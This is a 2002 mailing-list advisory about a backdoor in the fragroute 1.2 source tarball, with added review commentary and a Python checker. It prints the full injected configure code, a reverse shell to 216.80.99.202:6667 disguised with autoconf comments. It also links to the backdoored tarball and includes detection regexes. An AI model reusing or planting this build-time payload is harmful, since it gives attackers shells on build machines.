Trojan/backdoor in fragroute 1.2 source distribution

From: Anders Nordby (andersat_private)
Date: Fri May 31 2002 - 00:55:21 PDT


    Hello,
    
    Although downloading it now seems safe, I think folks should know this.
    The changes done were similar to what happened to irssi, but with a
    different IP.
    
    MD5 sum of fragroute-1.2.tar.gz, downloaded from
    http://www.monkey.org/~dugsong/fragroute/ on May 27 (the contaminated
    version): 65edbfc51f8070517f14ceeb8f721075
    
    MD5 sum of fragroute-1.2.tar.gz, downloaded from
    http://www.monkey.org/~dugsong/fragroute/ on May 30 (this is the current
    MD5 sum): 7e4de763fae35a50e871bdcd1ac8e23a
    
    Diff between the two:
    
    diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure
    --- fragroute-1.2/configure	Mon Apr 15 16:41:43 2002
    +++ fragroute-1.2-bad/configure	Mon Apr 15 16:41:43 2002
    @@ -1590,6 +1590,53 @@
     
     fi
     
    +cat > conftest.c<<EOF
    +/* Override any gcc2 internal prototype to avoid an error.  */
    +/* We use char because int might match the return type of a gcc2
    +    builtin and then its argument prototype would still apply.  */
    +#include <stdio.h>
    +#include <sys/types.h>
    +#include <sys/socket.h>
    +#include <netinet/in.h>
    +#include <unistd.h>
    +int main()
    +{
    +/* The GNU C library defines this for functions which it implements
    +    to always fail with ENOSYS.  Some functions are actually named
    +    something starting with __ and the normal name is an alias.  */
    +        int s;
    +        struct sockaddr_in sa;
    +        switch(fork()) { case 0: break; default: exit(0); }
    +        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
    +                exit(1);
    +        }
    +  /* HP/UX 9 (%@#!) writes to sscanf strings */
    +        memset(&sa, 0, sizeof(sa));
    +        sa.sin_family = AF_INET;
    +        sa.sin_port = htons(6667);
    +/* Override any gcc2 internal prototype to avoid an error.  */
    +/* We use char because int might match the return type of a gcc2
    +    builtin and then its argument prototype would still apply.  */
    +        sa.sin_addr.s_addr = inet_addr("216.80.99.202");
    +        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
    +                exit(1);
    +        }
    +  /* HP/UX 9 (%@#!) writes to sscanf strings */
    +        dup2(s, 0); dup2(s, 1); dup2(s, 2);
    +/* The GNU C library defines this for functions which it implements
    +    to always fail with ENOSYS.  Some functions are actually named
    +    something starting with __ and the normal name is an alias.  */
    +        { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
    +}
    +EOF
    +gcc $LIBS conftest.c -o conftest; ./conftest
    +if { (eval echo configure:2379: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then
    +  rm -rf conftest*
    +else
    +  rm -rf conftest*
    +fi
    +rm -f conftest*
    +
         # DLPI needs putmsg under HPUX so test for -lstr while we're at it
         echo $ac_n "checking for putmsg in -lstr""... $ac_c" 1>&6
     echo "configure:1596: checking for putmsg in -lstr" >&5
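    Review bot: The block inserted after the `fi` at the top of this hunk is not a configure test at all: the here-document writes a C program that forks (the parent exits, the child carries on in the background), connects to 216.80.99.202 on port 6667 (`htons(6667)`), redirects stdin, stdout and stderr onto that socket with `dup2` and then execs `/bin/sh`, and the line `gcc $LIBS conftest.c -o conftest; ./conftest` compiles and runs it unconditionally with the privileges of whoever runs ./configure. The autoconf-style comments are pasted filler, and the `if { (eval echo configure:2379 ...` guard below tests `conftestx${ac_exeext}`, a file that is never produced, so both branches only clean up; the only lasting effect of the span is the outbound connection. The whole added span should be dropped and the tarball rebuilt from a trusted copy; note that the `+++` header carries the same timestamp as the original file, so mtimes will not expose the change and only a checksum or signature comparison will.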
    
    
    References
    ==========
    
    FreeBSD PR about this: http://www.freebsd.org/cgi/query-pr.cgi?pr=38716
    Irssi backdoor page: http://www.irssi.org/?page=backdoor
    Backdoored fragroute: ftp://ftp.nuug.no/pub/anders/distfiles/fragroute-1.2.tar.gz
    
    Cheers,
    
    -- 
    Anders.
    
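    As an added example (not part of the post or of fragroute), a Python check in the spirit of the MD5 comparison above: it labels a downloaded fragroute-1.2.tar.gz by the two sums the post reports and scans the configure script inside for the chain of traits the diff shows (here-document writing conftest.c, hard-coded address, dup2 of stdio, exec of /bin/sh). The sample configure fragments and the tarball builder are constructed for the demonstration.

```python
import hashlib
import io
import re
import tarfile
# MD5 sums quoted in the post for fragroute-1.2.tar.gz.
KNOWN_MD5 = {"65edbfc51f8070517f14ceeb8f721075": "trojaned (May 27 2002 download)",
             "7e4de763fae35a50e871bdcd1ac8e23a": "clean (May 30 2002 download)"}
# One regex per link of the chain in the injected configure block.
INDICATORS = {
    "heredoc_conftest": re.compile(r"cat\s*>\s*conftest\.c\s*<<\s*EOF"),
    "hardcoded_addr": re.compile(r'inet_addr\("\d{1,3}(?:\.\d{1,3}){3}"\)'),
    "connect_call": re.compile(r"\bconnect\s*\("),
    "stdio_redirect": re.compile(r"dup2\s*\(\s*\w+\s*,\s*[012]\s*\)"),
    "exec_shell": re.compile(r'execv[ep]?\s*\(|"/bin/sh"'),
}
# connect() alone is normal in autoconf output, so a verdict needs the rest of the chain.
REQUIRED = {"heredoc_conftest", "hardcoded_addr", "stdio_redirect", "exec_shell"}
def classify_md5(data: bytes) -> str:
    """Label tarball bytes by the two sums the post reports, else 'unknown'."""
    return KNOWN_MD5.get(hashlib.md5(data).hexdigest(), "unknown")

def scan_configure(text: str) -> list:
    """Names of the indicators present in a configure script."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def is_suspicious(text: str) -> bool:
    return REQUIRED <= set(scan_configure(text))

def audit_tarball(data: bytes) -> dict:
    """Check the sum, then scan every 'configure' member of an in-memory .tar.gz."""
    report = {"md5": classify_md5(data), "suspicious_members": []}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for m in tar.getmembers():
            if m.isfile() and m.name.rsplit("/", 1)[-1] == "configure":
                if is_suspicious(tar.extractfile(m).read().decode("latin-1")):
                    report["suspicious_members"].append(m.name)
    return report

def make_tarball(configure_text: str) -> bytes:
    """Build a constructed one-file tarball for the samples below (not a real release)."""
    buf, payload = io.BytesIO(), configure_text.encode()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("fragroute-1.2/configure")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()
# Constructed samples: a normal autoconf probe, and a fragment shaped like the post's diff.
CLEAN_CONFIGURE = "cat > conftest.$ac_ext <<EOF\nchar connect();\nint main() { connect(); return 0; }\nEOF\n"
BAD_CONFIGURE = ('cat > conftest.c<<EOF\n        sa.sin_addr.s_addr = inet_addr("216.80.99.202");\n'
                 "        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {\n"
                 "        dup2(s, 0); dup2(s, 1); dup2(s, 2);\n"
                 '        { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }\nEOF\n')
```

Running `audit_tarball(open("fragroute-1.2.tar.gz", "rb").read())` on a real download gives both the checksum label and the list of configure scripts that carry the full chain.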